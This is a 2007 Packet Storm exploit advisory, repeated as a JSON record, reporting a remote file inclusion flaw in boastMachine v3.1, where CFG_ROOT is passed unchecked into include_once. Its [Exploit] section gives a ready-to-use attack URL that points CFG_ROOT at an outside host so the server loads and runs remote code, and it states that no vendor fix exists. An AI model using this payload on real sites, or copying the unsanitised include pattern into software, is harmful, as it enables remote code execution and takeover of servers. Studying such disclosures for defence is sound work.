ID PACKETSTORM:56128
Type packetstorm
Reporter Silitoad
Modified 2007-04-23T00:00:00
Description
`***************************************** *
*AuThor:Silitoad ************************ *
*emA!l:Silitoad[at]hotmail[dot]Com ****** *
*HoMePaGe:http://www.Arabian-FighterZ.com *
***************************************** *
Powered By Silitoad From Arabian-Fighterz
[Info]
cms:boastMachine v3.1
website:http://boastology.com
download:http://boastology.com/pages/dload.php?id=bmachine-3.1.zip
bug: GENERAL/COMMON FUNCTIONS
include_once CFG_ROOT."/inc/core/show.inc.php";
[Vuls]
[Exploit]
http://target/bmachine-3.1/bmachine/bmc/functions.php?CFG_ROOT=http://evilcode.txt
?
[Fix]
Vuls has been reported to author,No reply yet...
[Greetings]
Greets To Linux_m,l1nuxm4,Sn1p8r,Sbitar,Op3runix
`
{"id": "PACKETSTORM:56128", "type": "packetstorm", "bulletinFamily": "exploit", "title": "boastmachine31-rfi.txt", "description": "", "published": "2007-04-23T00:00:00", "modified": "2007-04-23T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/56128/boastmachine31-rfi.txt.html", "reporter": "Silitoad", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:25:21", "viewCount": 2, "enchantments": {"score": {"value": -0.5, "vector": "NONE", "modified": "2016-11-03T10:25:21", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:25:21", "rev": 2}, "vulnersScore": -0.5}, "sourceHref": "https://packetstormsecurity.com/files/download/56128/boastmachine31-rfi.txt", "sourceData": "`***************************************** * \n*AuThor:Silitoad ************************ * \n*emA!l:Silitoad[at]hotmail[dot]Com ****** * \n*HoMePaGe:http://www.Arabian-FighterZ.com * \n***************************************** * \n \n \nPowered By Silitoad From Arabian-Fighterz \n \n[Info] \n \ncms:boastMachine v3.1 \n \nwebsite:http://boastology.com \n \ndownload:http://boastology.com/pages/dload.php?id=bmachine-3.1.zip \n \nbug: GENERAL/COMMON FUNCTIONS \n \ninclude_once CFG_ROOT.\"/inc/core/show.inc.php\"; \n \n \n \n[Vuls] \n \n \n \n[Exploit] \n \nhttp://target/bmachine-3.1/bmachine/bmc/functions.php?CFG_ROOT=http://evilcode.txt \n? \n \n[Fix] \n \nVuls has been reported to author,No reply yet... \n \n[Greetings] \n \nGreets To Linux_m,l1nuxm4,Sn1p8r,Sbitar,Op3runix \n`\n"}
{}